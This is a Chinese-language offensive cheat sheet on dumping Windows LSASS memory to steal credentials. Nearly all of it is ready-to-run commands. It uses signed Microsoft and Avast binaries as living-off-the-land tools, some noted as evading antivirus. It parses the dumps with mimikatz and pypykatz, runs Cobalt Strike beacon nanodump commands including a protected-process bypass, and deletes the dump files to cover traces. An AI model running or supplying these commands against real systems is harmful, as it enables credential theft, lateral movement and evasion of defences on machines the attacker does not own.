Credential

6.1 LSASS进程dump方法总结

1. procdump dmp内存存储文件

procdump64.exe -accepteula -ma lsass.exe C:\programdata\lsass.dmp

mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"

2. sqldumper dmp内存存储文件

• 方法一:

tasklist /svc |findstr lsass.exe
sqldumper.exe [lsass PID] 0 0x01100

• 方法二:

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do sqldumper.exe %i 0 0x01100

• mimikatz读取mdmp文件:

mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit"

3. avdump64 dmp内存存储文件

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do powershell -c ".\AvDump_64.exe --pid %i --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file c:\programdata\lsass.dmp"

4. .net createdump dmp内存存储文件

.net5 下载地址
https://download.visualstudio.microsoft.com/download/pr/f05c10fe-fed3-43b6-b676-ff75021c2d9f/15cab750af61a29d70ef33c265354cf2/dotnet-runtime-5.0.3-win-x64.exe
安装成功的路径地址
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.3\createdump.exe
tasklist /svc | findstr lsass    //查看lsass进程pid

PsExec.exe -s -i -d cmd.exe    //获取system权限

"C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.0.3\createdump.exe"  -u -f C:\programdata\lsass.dmp pid

powershell 可直接获取dmp文件
powershell -c ".\createdump.exe -u -f lsass.dmp pid"

5. comsvcs.dll dmp内存存储文件

powershell -c "rundll32 C:\windows\system32\comsvcs.dll, MiniDump 808 C:\programdata\lsass.dmp full"

• comsvcs.dll dmp内存存储文件

for /f "tokens=1,2 delims= " %A in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do powershell -c "C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump %B lsass.dmp full"

6. DumpMinitool dmp内存存储文件

• Visual Studio 2022自带、微软签名、免杀

C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do DumpMinitool.exe --file 1.txt --processId %i --dumpType Full

7. SharpDump dmp内存存储文件

for /f "tokens:2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do sharpDump.exe %i

8. Github dmp内存存储文件

https://github.com/codewhitesec/HandleKatz

https://github.com/post-cyberlabs/Offensive_tools/tree/main/PostDump

https://github.com/helpsystems/nanodump

https://twitter.com/mrd0x/status/1460597833917251595 dump64.exe

https://github.com/itm4n/PPLdump

6.2 dump lsa聚合

解密lsass内存

# mimikatz
sekurlsa::Minidump lsassdump.dmp
sekurlsa::logonPasswords full

wce导出hash

# 仅支持Windows XP，2003，Vista，7、2008和Windows 8

wce.exe -o file.txt
wec.exe

Procdump

# 管理员cmd
procdump  -accepteula -ma lsass.exe lsass_dump

procdump -accepteula -ma 720 lsass.dmp

comsvcs.dll

# powershell运行
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass.dmp full

# 清理
Remove-Item $env:TEMP\lsass.dmp -ErrorAction Ignore

dumpert

# exe
Outflank-Dumpert.exe

# dll
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

任务管理器转存

mimikatz

# cmd
mimikatz_exe "sekurlsa::minidump lsass.dump" "sekurlsa::logonpasswords full" exit

pypykatz

# python3
pip install pypykatz

# Parsing minidump file of the LSASS process:
# 从dmp里解密
pypykatz lsa minidump <minidump file>

# Dumping LIVE system LSA secrets:
pypykatz live lsa

volatility3

# 安装
https://github.com/volatilityfoundation/volatility3/releases/download/v2.0.1/volatility3-2.0.1-py3-none-any.whl
python3 -m pip install -U volatility3-2.0.1-py3-none-any.whl

# 使用
vol -f xxx.dmp -o 111.txt

Out-Minidump.ps1

import-module Out-Minidump.ps1
get-process lsass | Out-Minidump

Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore

dump64.exe

一个lolbins：C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\

"C:\Program Files (x86)\Microsoft Visual Studio\Installer\Feedback\dump64.exe" <pid> c:\users\zteam\Desktop\out.dmp

SqlDumper.exe

lolbins：C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe

# Full dump file
"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" <pid> 0 0x01100

# Mini-dump file
"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" <pid> 0 0x0120

# Mini-dump file that includes indirectly referenced memory.
"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" <pid> 0 0x0128

# Filtered dump file
"C:\Program Files\Microsoft SQL Server\100\Shared\SqlDumper.exe" <pid> 0 0x8100

nanodump

https://github.com/helpsystems/nanodump

# fork
beacon> nanodump --fork --write C:\lsass.dmp

# MalSecLogon
beacon> nanodump --malseclogon --dup --fork --binary C:\Windows\notepad.exe --valid


# ppl bypass
beacon> nanodump_ppl -v -w C:\Windows\Temp\lsass.dmp

HandleKatz

https://github.com/codewhitesec/HandleKatz

loader.exe --pid:744 --outfile:dump.obfuscated

loader需要自己改改

DumpMinitool

又一个lolbins：C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\Extensions\TestPlatform\Extensions\DumpMinitool.exe

DumpMinitool.exe --file c:\users\public\111.txt --processId 744 --dumpType Full

# 解密
python3 Decoder.py -input dump.obfuscated -output 111.txt

# 可以用pypykatz读取
pypykatz lsa minidump 111.txt

AvDump

AvDump.exe是Avast杀毒软件中自带的一个程序，可用于转储指定进程（lsass.exe）内存数据，它带有Avast杀软数字签名。

AvDump.exe --pid 980 --exception_ptr 0 --thread_id 0 --dump_level 1 --dump_file lsass.dmp

MirrorDump

https://github.com/CCob/MirrorDump

无需本地dll支持